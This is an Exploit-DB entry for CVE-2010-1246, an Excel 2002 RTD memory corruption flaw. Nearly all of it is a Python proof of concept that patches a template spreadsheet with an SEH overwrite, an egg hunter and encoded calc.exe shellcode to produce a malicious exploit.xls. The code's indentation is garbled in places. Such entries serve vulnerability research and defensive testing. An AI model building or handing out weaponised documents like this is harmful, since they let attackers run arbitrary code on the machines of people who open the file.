Excel RTD – Memory Corruption

  • 作者: Abysssec
    日期: 2010-09-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14966/
  • '''
________ __ ____
 |\/|/ __ \ /\| || |_ \ 
 | \/ | || | /\ | || | |_) |
 | |\/| | || |/ /\ \| || |_ < 
 | || | |__| / ____ \ |__| | |_) |
 |_||_|\____/_/\_\____/|____/ 

http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14966.zip (moaub-10-exploit.zip)
'''

'''
Title :Excel RTD Memory Corruption 
Version :Excel 2002 sp3
Analysis:http://www.abysssec.com
Vendor:http://www.microsoft.com
Impact:Critical
Contact :shahin [at] abysssec.com , info[at] abysssec.com
Twitter :@abysssec
CVE :CVE-2010-1246
MOAUB Number:MOAUB_10_BA
'''



import sys

def main():
 
try:
		fdR = open('src.xls', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:4509]
		str2 = strTotal[5013:15000]
		str3 = strTotal[15800:]
		
		eip = "\xAd\x57\x00\x30"# pop pop ret
		jmp = "\xF7\xC2\x03\x30"# call esp
		
		#Egg Hunter	
		eggHunter = ""
		eggHunter += "\x90\x90\x90"
		eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
		eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"		
		
		# shellcode calc.exe
		shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
		
		if len(eggHunter) > 266:
			print "[*] Error : Shellcode length is long"
			return
		if len(eggHunter) <=266:
			dif =266 - len(eggHunter)
			while dif > 0 :
				eggHunter += '\x90'
				dif = dif - 1
				
				
		if len(shellcode) > 800:
			print "[*] Error : Shellcode length is long"
			return
		if len(shellcode) <= 800:
			dif = 800 - len(shellcode)
			while dif > 0 :
				shellcode += '\x90'
				dif = dif - 1
				
		fdW= open('exploit.xls', 'wb+')
		fdW.write(str1)
		fdW.write("\x41\x41\x41")# padding
		fdW.write(jmp)
		fdW.write(eggHunter)				
		fdW.write("\xeb\x06\x41\x41") 
		fdW.write(eip)
		fdW.write("\x81\xc4\x24\x16\x00\x00")# add esp,2016
		fdW.write("\xc3")#ret
		
		i = 0 
		while i < 54 :
			fdW.write("\x41\x41\x41\x41")# padding
			i = i + 1
			
		fdW.write(str2)
		fdW.write(shellcode)
		fdW.write(str3)
		
		fdW.close()
		fdR.close()
		print '[-] Excel file generated'
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)

if __name__ == '__main__':
main()